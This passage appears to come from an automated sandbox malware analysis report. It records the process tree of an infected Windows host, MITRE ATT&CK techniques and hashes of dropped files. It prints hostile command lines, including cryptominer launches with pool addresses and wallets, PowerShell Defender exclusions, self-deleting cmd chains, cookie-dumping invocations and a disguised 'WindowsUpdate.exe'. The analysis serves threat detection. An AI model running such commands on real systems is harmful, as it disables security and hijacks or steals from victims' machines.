                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Modifies system certificate store
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4268
                                                                                                                        • C:\Users\Admin\AppData\Roaming\D305.tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\D305.tmp.exe"
                                                                                                                          3⤵
                                                                                                                            PID:4608
                                                                                                                            • C:\Users\Admin\AppData\Roaming\D305.tmp.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\D305.tmp.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2036
                                                                                                                          • C:\Users\Admin\AppData\Roaming\D7B9.tmp.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\D7B9.tmp.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:4852
                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w19370@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                              4⤵
                                                                                                                                PID:4888
                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w28399 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                4⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                PID:4084
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                              3⤵
                                                                                                                                PID:5248
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping 127.0.0.1
                                                                                                                                  4⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:5332
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              PID:5932
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5216
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:68
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5008
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                3⤵
                                                                                                                                  PID:1812
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  3⤵
                                                                                                                                    PID:4420
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:4076
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                  2⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2036
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:708
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                1⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:596
                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4496
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4808
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4608
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5448
                                                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                                                  werfault.exe /h /shared Global\cdeb740f4d6e4683bcc8019676a95f58 /t 2260 /p 5448
                                                                                                                                  1⤵
                                                                                                                                    PID:6060
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DEDE.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DEDE.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:2304
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:4940
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E586.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E586.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4776
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F006.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F006.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops startup file
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • NTFS ADS
                                                                                                                                      PID:4496
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F98D.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F98D.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:3708
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F98D.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F98D.exe
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:5300
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E1.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E1.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4056
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\69F.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\69F.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3568
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C2D.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C2D.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Windows security modification
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5568
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\492928cf-4127-482f-a735-71c2eebe9d9a\AdvancedRun.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\492928cf-4127-482f-a735-71c2eebe9d9a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\492928cf-4127-482f-a735-71c2eebe9d9a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1540
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\492928cf-4127-482f-a735-71c2eebe9d9a\AdvancedRun.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\492928cf-4127-482f-a735-71c2eebe9d9a\AdvancedRun.exe" /SpecialRun 4101d8 1540
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5760
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\C2D.exe" -Force
                                                                                                                                        2⤵
                                                                                                                                          PID:5484
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C2D.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\C2D.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5444
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C2D.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\C2D.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5828
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1508.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1508.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Windows security modification
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        PID:4516
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\08c1a1f7-3f3c-4138-9804-079b34e1715d\AdvancedRun.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\08c1a1f7-3f3c-4138-9804-079b34e1715d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\08c1a1f7-3f3c-4138-9804-079b34e1715d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5204
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\08c1a1f7-3f3c-4138-9804-079b34e1715d\AdvancedRun.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\08c1a1f7-3f3c-4138-9804-079b34e1715d\AdvancedRun.exe" /SpecialRun 4101d8 5204
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:6072
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1508.exe" -Force
                                                                                                                                          2⤵
                                                                                                                                            PID:4280
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1508.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1508.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2788
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Windows security modification
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:1524
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1dbd4428-b42f-466d-9f6e-fa2218c07646\AdvancedRun.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1dbd4428-b42f-466d-9f6e-fa2218c07646\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1dbd4428-b42f-466d-9f6e-fa2218c07646\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3088
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1dbd4428-b42f-466d-9f6e-fa2218c07646\AdvancedRun.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1dbd4428-b42f-466d-9f6e-fa2218c07646\AdvancedRun.exe" /SpecialRun 4101d8 3088
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:2992
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe" -Force
                                                                                                                                                4⤵
                                                                                                                                                  PID:5924
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:5912
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5128
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\WindowsUpdate.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:4196
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:3508
                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:5208
                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5768
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5336
                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3992
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5056
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2176
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5496
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5588
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2276
                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5452
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210428-0647.dm
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3136
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8278.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8278.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    PID:5540
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 8278.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8278.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4340
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /im 8278.exe /f
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:6100
                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                          timeout /t 6
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:5516
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5340
                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5508
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5088
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5372
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5908
                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5908 -s 1248
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  PID:1576
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4088
                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 4088 -s 1216
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    PID:5536
                                                                                                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                                                                                                  werfault.exe /h /shared Global\bbb8deae2df44fb39776e7228ce9cd08 /t 5512 /p 4088
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5004

                                                                                                                                                                                  Network

                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                  Persistence

                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                  1
                                                                                                                                                                                  T1060

                                                                                                                                                                                  BITS Jobs

                                                                                                                                                                                  1
                                                                                                                                                                                  T1197

                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                  3
                                                                                                                                                                                  T1089

                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                  6
                                                                                                                                                                                  T1112

                                                                                                                                                                                  BITS Jobs

                                                                                                                                                                                  1
                                                                                                                                                                                  T1197

                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                  1
                                                                                                                                                                                  T1130

                                                                                                                                                                                  Credential Access

                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                  3
                                                                                                                                                                                  T1081

                                                                                                                                                                                  Discovery

                                                                                                                                                                                  Software Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1518

                                                                                                                                                                                  Query Registry

                                                                                                                                                                                  4
                                                                                                                                                                                  T1012

                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                  5
                                                                                                                                                                                  T1082

                                                                                                                                                                                  Security Software Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1063

                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1120

                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                  1
                                                                                                                                                                                  T1018

                                                                                                                                                                                  Collection

                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                  3
                                                                                                                                                                                  T1005

                                                                                                                                                                                  Command and Control

                                                                                                                                                                                  Web Service

                                                                                                                                                                                  1
                                                                                                                                                                                  T1102

                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                  Downloads

                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                  • C:\Program Files\Microsoft Office 15\TGIIMTYDIE\ultramediaburner.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                  • C:\Program Files\Microsoft Office 15\TGIIMTYDIE\ultramediaburner.exe
                                                                                                                                                                                    MD5

                                                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    806c3221a013fec9530762750556c332

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                                                                    MD5

                                                                                                                                                                                    bef5c483c6eba257020201190666e28d

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                                                                                                    SHA256

                                                                                                                                                                                    d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                                                                                                    SHA512

                                                                                                                                                                                    302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                                                                    MD5

                                                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                    SHA1

                                                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                    SHA256

